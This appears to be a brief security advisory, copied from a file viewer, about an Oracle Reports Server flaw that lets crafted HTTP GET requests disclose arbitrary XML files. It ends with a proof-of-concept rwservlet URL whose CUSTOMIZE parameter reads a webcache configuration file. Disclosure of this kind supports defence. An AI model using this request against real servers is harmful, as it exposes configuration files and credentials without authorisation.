11 lines
No EOL
584 B
Text
11 lines
No EOL
584 B
Text
source: http://www.securityfocus.com/bid/14311/info
|
|
|
|
Oracle Reports Server may allow remote attackers to disclose parts of arbitrary XML files.
|
|
|
|
Reportedly, the server fails to restrict users from accessing parts of arbitrary XML files when handling specially crafted HTTP GET requests.
|
|
|
|
All versions of Oracle Reports Server are reported to be vulnerable to this issue.
|
|
|
|
http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
|
|
ott/tiger@iasdb+destype=cache+desformat=xml+CUSTOMIZE=/opt/ORACLE/ias/oracle/pro
|
|
duct/9.0.2/webcache/webcache.xml |